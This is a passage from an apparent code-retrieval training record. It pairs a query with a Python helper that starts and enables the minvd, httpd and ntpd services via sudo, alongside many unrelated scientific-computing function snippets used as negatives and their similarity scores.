Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def test_superposition_ud_cnot():\n program = dedent(\n \"\"\"\\\n register q0[0]\n register q1[1]\n H q1\n CNOT q1 q0\n \"\"\"\n )\n\n result = run(program, run_gate_array, return_distribution=True)\n assert isclose(result, [0.5, 0.0, 0.0, 0.5]).all()", "def em_step(t, eng, fre):\n # TODO\n # Lecture Steps:\n # 1. Make a table of P(f|e) for all possible pairs of f and e, prob_tab\n # 2. Make a grid where each sentence pair is a row and each possible\n # alignment is a column\n # 3. For each sentence pair and alignment compute P(F|a,E)\n # Given aligned words f1,f2,...,fn and e1,e2,...,en in the pair:\n # P(F|a,E) = prob_tab[f1][e1] * ... * prob_tab[fn][en]\n # 4. For each sentence pair and alignment\n # divide P(F|a,E) by the sum of the P(F|a,E)'s in the row\n # this is P(a|E,F)\n # 5. For each possible word pair e and f, sum P(a|E,F) across all\n # alignments and sentence pairs for each instance that e is aligned\n # with f, this gets out a TCount table\n # 6. Sum over the rows of TCount to get the total estimates for each\n # english word e.\n # 7. Compute P(f|e) = TCount[f][e] / Total[e]\n # This is the model after 1 iteration.\n\n '''\n Tutorial Steps:\n initialize P(f|e)\n for a number of iterations:\n set tcount(f, e) to 0 for all f, e\n set total(e) to 0 for all e\n for each sentence pair (F, E) in training corpus:\n for each unique word f in F:\n denom_c = 0\n for each unique word e in E:\n denom_c += P(f|e) * F.count(f)\n for each unique word e in E:\n tcount(f, e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n total(e) += P(f|e) * F.count(f) * E.count(e) / denom_c\n for each e in domain(total(:)):\n for each f in domain(tcount(:,e)):\n P(f|e) = tcount(f, e) / total(e)\n '''\n\n '''\n My Pseudocode:\n The Table of P(f|e) is already initiated as the AM dictionary.\n Presumably the AM is passed in as t.\n Initialize TCount as a dictionary like AM, e.g. TCount[e][f] = 0\n Initialize Total as a dictionary with the same entries as TCount[e] = 0\n for i in range(0,len(eng)):\n\n '''\n AM = dict.fromkeys(t.keys(), 0)\n Total = dict.fromkeys(t.keys(), 0)\n TCount = dict.fromkeys(t.keys(), 0)\n for key in TCount.keys():\n TCount[key] = dict.fromkeys(t[key].keys(), 0)\n AM[key] = dict.fromkeys(t[key].keys(), 0)\n\n num_sentences = min(len(eng), len(fre))\n for i in range(0, num_sentences):\n E = eng[i]\n F = fre[i]\n E_uniques = list(set(E))\n F_uniques = list(set(F))\n for f in F_uniques:\n denom_c = 0\n for e in E_uniques:\n denom_c += t[e][f] * F.count(f)\n for e in E_uniques:\n TCount[e][f] += t[e][f] * F.count(f) * E.count(e) / denom_c\n Total[e] += t[e][f] * F.count(f) * E.count(e) / denom_c\n for e in Total.keys():\n for f in TCount[e].keys():\n AM[e][f] = TCount[e][f] / Total[e]\n\n return AM", "def test_nr_trinuc(self):\n preds = [\n MotifChange(\"A\", \"C\"),\n MotifChange(\"G\", \"A\"),\n MotifChange(\"CGA\", \"TGA\"),\n ]\n sm = substitution_model.TimeReversibleTrinucleotide(predicates=preds)\n got = sm.get_param_list()\n self.assertEqual(got, [\"A/C\", \"G/A\", \"CGA/TGA\"])\n self.assertEqual(len(sm.get_motifs()), 64)", "def event_m20_11_4000000():\n \"\"\"State 0,2: [Lib] Character: Petrified: Key Guide_SubState\"\"\"\n assert event_m20_11_x37(z94=5300, z95=0, z96=15, z97=211000030, z98=0, z99=1600, z100=6, z101=4000010)\n \"\"\"State 1: Finish\"\"\"\n EndMachine()", "def ec_matrix_vector(p0, T, n): \n if(n<=0):\n EC=np.zeros(T.shape)\n return EC\n else:\n \"\"\"Probability vector after (k=0) propagations\"\"\" \n p_k=1.0*p0\n \"\"\"Sum of vectors after (k=0) propagations\"\"\"\n p_sum=1.0*p_k \n for k in xrange(n-1):\n \"\"\"Propagate one step p_{k} -> p_{k+1}\"\"\"\n p_k=np.dot(p_k,T) \n \"\"\"Update sum\"\"\"\n p_sum+=p_k \n \"\"\"Expected counts\"\"\"\n EC=p_sum[:,np.newaxis]*T \n return EC", "def p(e, t):\n return b * e ** 2", "def binary_dec(A,n_iter = 1000):\n\n\t### Initialization ###\n\n\tp, q = np.shape(A)\n\t### B : to be changed\n\tB = np.eye(p)\n \t###\n\tC = bin_random_mat(p,q)\n\tlist_dist = []\n\tB_argmin = B\n\tC_argmin = C\n\n\n\n\n\t## temperature ##\n\tT_n = np.log(np.arange(2,n_iter+2,1))\n\t#T_n = np.arange(2,n_iter+2,1)\n\tfor i in range(n_iter):\n\t## update ##\n\t\tC_0 = np.matrix(C)\n\t\tlist_dist =np.append( list_dist, V_potential(np.dot(B,C_0),A) )\n\t\tif V_potential(np.dot(B_argmin,C_argmin),A) == 0:\n\t\t\tbreak\n\t########## transition #############\n\t# Here we take 2 steps independent(for B and for C respectively)\n\t# We could also use metropolis hasting kernel.\n\n\t\tC_iter = np.matrix(Metropolis_transition_C(C))\n\t\n\n\t\tB_iter = B[np.random.permutation(np.arange(p))]\n\t\t\n\t\tif np.random.uniform(0,1,1) < \\\n\t\t\t\tnp.exp(-1./T_n[i]*( V_potential(np.dot(B_iter,C_iter), A)\\\n\t\t\t\t - V_potential(np.dot(B,C_0),A) ) ):\n\t\t\tC = C_iter\n\t\t\tB = B_iter\n\t######### end of transition ##############\n\n\t\t\tif V_potential(np.dot(B,C),A) < np.min(list_dist):\n\t\t\t\t\n\t\t\t\tB_argmin = B\n\t\t\t\tC_argmin = np.matrix(C)\n\t\t\t# print i+1\n\t\t\t# print V_potential(np.dot(B_argmin,C_argmin),A)\n\t\t\t# print C_argmin\n\t\t\t# print '\\n'\n\n\treturn list_dist,B_argmin, C_argmin", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def trc_fgen_prefb(self,trc,dt,nspad=200,hwin=150,vlen=51):\n output=np.zeros((len(trc),((11*(vlen))+1)))\n pad=np.random.rand(nspad)/100\n trc_norm=trc/np.amax(np.abs(trc))\n trc_norm_padded=np.hstack((pad,trc_norm))\n trc_entropy=self.entropy(trc_norm_padded,50)\n trc_fdm=self.fdm(trc_norm_padded,50,np.arange(1,4),15)\n trc_slta=trigger.classic_sta_lta(trc_norm_padded,2,100)\n trc_fq_win_sum=self.fq_win_sum(trc_norm_padded,hwin,dt)\n hwin2=50\n trc_kurtosis_skew=self.kurtosis_skewness(trc_norm_padded,hwin2)\n for i,j in enumerate(trc):\n ftrc=[]\n fb=i*dt\n ftrc=np.append(ftrc,trc_norm_padded[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(np.abs(trc_norm_padded)))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_entropy)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_entropy))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_fdm)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fdm))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1]) \n ftrc=np.append(ftrc,self.norm(trc_slta)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_fq_win_sum)[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(np.gradient(trc_fq_win_sum))[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[0])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,self.norm(trc_kurtosis_skew[1])[np.int(nspad+fb/dt)-vlen+1:np.int(nspad+fb/dt)+1])\n ftrc=np.append(ftrc,1)\n output[i,:]=ftrc\n return output", "def expected_counts(p0, T, n): \n M=T.shape[0]\n if n<=M:\n return ec_matrix_vector(p0, T, n)\n else:\n return ec_geometric_series(p0, T, n)", "def condition_tpm(self,tpm, fixed_nodes, state):\n conditioning_indices = [[slice(None)]] * len(state)\n for i in fixed_nodes:\n # Preserve singleton dimensions with `np.newaxis`\n conditioning_indices[i] = [state[i], np.newaxis]\n # Flatten the indices.\n conditioning_indices = list(chain.from_iterable(conditioning_indices))\n # Obtain the actual conditioned TPM by indexing with the conditioning\n # indices.\n return tpm[tuple(conditioning_indices)]", "def solve_LF(self):\n self.u = zeros(self.N)\n self.u[0] = self.u0\n self.u[1] = self.u1\n u = self.u\n f= self.f\n dt = self.dt\n t = self.t\n N = self.N\n for n in xrange(1,N-1):\n u[n+1] = 2*dt*f(u[n],t[n]) + u[n-1]\n #return t,u", "def test_LM(self):\n\t\t\n\t\tprecision = 10**-8\n\t\t\t\t \n\t\tif self.n == 1:\n\t\t\t\t \n\t\t\tP_sum = sum(self.estimate_prob('', w) for w in self.vocab)\n\t\t\t\n\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one.'\n\t\t\t\t \n\t\telif self.n == 2:\n\t\t\thistories = ['the', 'in', 'at', 'blue', 'white']\n\t\t\t\t \n\t\t\tfor h in histories:\n\t\t\t\t \n\t\t\t\tP_sum = sum(self.estimate_prob(h, w) for w in self.vocab)\n\t\t\t\t\n\t\t\t\tassert abs(1.0 - P_sum) < precision, 'Probability mass does not sum up to one for history' + h\n\t\t\t\t\t \n\t\tprint('TEST SUCCESSFUL!')", "def prove_NA1() -> Proof:\n # Optional Task 6.9a", "def skip_test(n):\n return k > 0 and magic * n * k**0.5 >= t4_ref", "def set_T_lm(self):\n self.delta_T_lm_array = ( ((self.exh.T_outlet_array -\n self.cool.T_inlet_array) - (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) / np.log((self.exh.T_outlet_array -\n self.cool.T_inlet_array) / (self.exh.T_inlet_array -\n self.cool.T_outlet_array)) )", "def solveForModeB1(X, M, n, maxInner, epsilon, tol,sita,Y1, lambta2):\n # Pi(n) = [A(N) kr A(N-1) kr ... A(n+1) kr A(n-1) kr .. A(1)]^T\n Pi = tensorTools.calculatePi(X, M, n)\n #print 'Pi size', Pi.shape\n #print 'pi='+str(Pi)\n #print(M.U[n])\n for iter in range(maxInner):\n # Phi = (X(n) elem-div (B Pi)) Pi^T\n #print X.vals.shape,X.shape\n #print X.vals.flatten().shape\n Phi = tensorTools.calculatePhi(X, M.U[n], Pi, n, epsilon=epsilon)\n #print('phi'+str(Phi))\n #print(Phi)\n # check for convergence that min(B(n), E - Phi(n)) = 0 [or close]\n kktModeViolation = np.max(np.abs(np.minimum(M.U[n], 1-Phi).flatten()))\n if (kktModeViolation < tol):\n break\n\n B=M.U[n]\n #print B.shape\n colNorm = np.apply_along_axis(np.linalg.norm, 0, B, 1)\n zeroNorm = np.where(colNorm == 0)[0]\n colNorm[zeroNorm] = 1\n B = B / colNorm[np.newaxis, :]\n tm=np.hstack((np.ones((B.shape[0],1)),B))\n Y1=Y1.reshape((Y1.shape[0],1))\n\n derive=-1.0*lambta2/B.shape[0]*np.dot((Y1-np.dot(tm,sita)),sita.T)\n #print derive.shape\n #print np.multiply(M.U[n],derive[:,1:]).shape\n #print np.multiply(M.U[n],Phi).shape\n M.U[n] = np.array(np.multiply(M.U[n],Phi))-np.array((np.multiply(M.U[n],derive[:,1:])))\n\n #print 'after'\n #print M.U[n][0]\n #print(\" Mode={0}, Inner Iter={1}, KKT violation={2}\".format(n, iter, kktModeViolation))\n return M, Phi, iter, kktModeViolation", "def __v(pk: float, pna: float, pcl: float, pca: float) -> float:\n ex_ion = pk * ex_k + pna * ex_na + pcl * in_cl + pca * ex_ca\n in_ion = pk * in_k + pna * in_na + pcl * ex_cl + pca * in_ca\n v = r * t / f * np.log(ex_ion/in_ion) * 1000\n return v", "def __init__(self, sim, A_phi, V0_frac, t, Ndec_response=4):\n self.A0 = A_phi[0]\n self.phi0 = A_phi[1]\n self.sim = sim\n self.V0_frac = V0_frac\n self.t = t\n self.x_eq0 = self.sim.x_eq([0,0, V0_frac*self.sim.V(t[0])*self.sim.C], t[0]) # Given the initial charge...\n self.sol = integrate.odeint(sim, self.x0, t=t)\n self.z = sim.zLI(self.sol, t)\n self.phi = np.unwrap(np.angle(self.z))\n self.t_filt = t_filt = t[15:] \n self.i0 = i0 = np.argmin(abs(self.t_filt)) \n self.ip = ip = np.argmin(abs(self.t_filt-self.sim.V.tp))\n self.phi_filt = phi_filt = np.convolve(self.phi, np.ones(16)/16.0, 'valid') # Dependent on using 16 samples / period\n self.df_filt = df_filt = np.gradient(self.phi_filt)/np.gradient(self.t_filt)\n self.t_wide = t_filt[::Ndec_response]\n self.respRePts = self.sim.responseReVec(self.t_wide)\n self.Ht = lambda t: np.interp(t, self.t_wide, self.respRePts)\n \n \n \n self.dphi_act = (phi_filt[ip] - phi_filt[i0])/ (2*np.pi)*1000\n self.phi_filt_mcyc = (phi_filt - phi_filt[0])*1e3/(2*np.pi)\n self.phi_est, self.dphi_est = estimate_dphi(self.df_python, self.i0, self.ip)\n self.error = (self.dphi_est - self.dphi_act)/self.dphi_act", "def viterbi(self):\n # initialisation\n self.phi = zeros((self.noOfEmmittingStates+2, self.T + 1))\n self.phi[0,0] = 1.0\n for i in range(1,self.noOfEmmittingStates+2):\n self.phi[i,0] = 0.0\n for t in range(1,self.T+1):\n self.phi[0,t] = 0.0\n self.traceback = zeros((self.noOfEmmittingStates+1, self.T+1))\n\n # main recursion\n for t in range(1, self.T + 1):\n for j in range(1, self.noOfEmmittingStates + 1):\n phiTemp = zeros((self.noOfEmmittingStates + 1, 1))\n for k in range(self.noOfEmmittingStates+1):\n phiTemp[k,0] = self.phi[k,t-1] * self.transitionMatrix[k, j-1]\n self.traceback[j-1,t-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[j, t] = phiTemp.max(0) * self.b[j-1, t-1]\n\n # last column - set states which can't reach term to 0, sub for term\n for j in range(1,self.noOfEmmittingStates + 1):\n if self.transitionMatrix[j,-1] == 0:\n self.phi[j,-1] = 0\n phiTemp = zeros((self.noOfEmmittingStates+1, 1))\n for k in range(self.noOfEmmittingStates + 1):\n phiTemp[k,0] = self.phi[k,-1] * self.transitionMatrix[k,-1]\n self.traceback[-1,-1] = nonzero(phiTemp == phiTemp.max(0))[0][0]\n self.phi[-1,-1] = phiTemp.max(0)", "async def _design_lvl_shift_internal_inv(self, pseg: int, nseg: int, out_inv_m: int,\n fanout: float,\n pinfo: Any, tbm_specs: Dict[str, Any], is_ctrl: bool,\n has_rst: bool, dual_output: bool,\n vin: str, vout: str) -> Tuple[int, int]:\n if is_ctrl: # size with fanout\n inv_nseg = int(np.round(nseg / fanout))\n inv_nseg = 1 if inv_nseg == 0 else inv_nseg\n inv_pseg = int(np.round(pseg / fanout))\n inv_pseg = 1 if inv_pseg == 0 else inv_pseg\n self.log(f\"Calculated inv to need nseg : {inv_nseg}\")\n self.log(f\"Calculated inv to need pseg : {inv_pseg}\")\n return inv_pseg, inv_nseg\n\n # First size the NMOS in the inverter assuming a reasonably sized PMOS\n inv_nseg = await self._design_lvl_shift_inv_pdn(pseg, nseg, out_inv_m, fanout, pinfo,\n tbm_specs, has_rst, dual_output, vin, vout)\n self.log(f\"Calculated inv to need at least nseg: {inv_nseg}\")\n\n # Now using the inverter pull down size, we size the inverter pull up PMOS\n inv_pseg, inv_nseg = await self._design_lvl_shift_inv_pun(pseg, nseg, inv_nseg, out_inv_m,\n fanout, pinfo,\n tbm_specs, has_rst, dual_output,\n vin, vout)\n self.log(f\"Calculated inv to need pseg: {inv_pseg} and nseg: {inv_nseg}\")\n return inv_pseg, inv_nseg", "def __init__(self, prim):\n self.actual = prim" ]
[ "0.5975354", "0.574612", "0.57286537", "0.5664337", "0.5646467", "0.5617162", "0.55988216", "0.55463326", "0.5473999", "0.5429033", "0.54245466", "0.54071516", "0.5387508", "0.5321748", "0.5301005", "0.5291172", "0.52895296", "0.5283824", "0.52834505", "0.52806515", "0.52792656", "0.5278463", "0.5276896", "0.5251637", "0.52331257", "0.5230351", "0.5220327", "0.5204915", "0.5203323", "0.51958525", "0.5187786", "0.51758975", "0.5168969", "0.5166589", "0.516177", "0.51508445", "0.5149464", "0.5147386", "0.5143932", "0.5135058", "0.51350117", "0.5134513", "0.5129724", "0.51290935", "0.5128879", "0.51184404", "0.5118359", "0.5116704", "0.51052344", "0.50946945", "0.5090614", "0.50796664", "0.5076155", "0.5071514", "0.5065052", "0.5064351", "0.50641894", "0.5059437", "0.5058119", "0.50545436", "0.50532484", "0.50495374", "0.5047005", "0.50444216", "0.503394", "0.5033133", "0.50300616", "0.5026538", "0.5020028", "0.5019024", "0.5009851", "0.50082016", "0.500663", "0.5004525", "0.49976382", "0.4994871", "0.49944523", "0.4994181", "0.4993715", "0.4985531", "0.4977474", "0.497716", "0.49746075", "0.4970822", "0.49581137", "0.49565706", "0.49532133", "0.4952891", "0.49523658", "0.4948384", "0.49453053", "0.49451953", "0.49428967", "0.49405053", "0.49392045", "0.4934651", "0.49346322", "0.49312845", "0.49287593", "0.49266976", "0.49229872" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.5
def run_services(): for service in ("minvd", "httpd", "ntpd"): sudo("service %s start" % service) sudo("chkconfig %s on" % service)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, 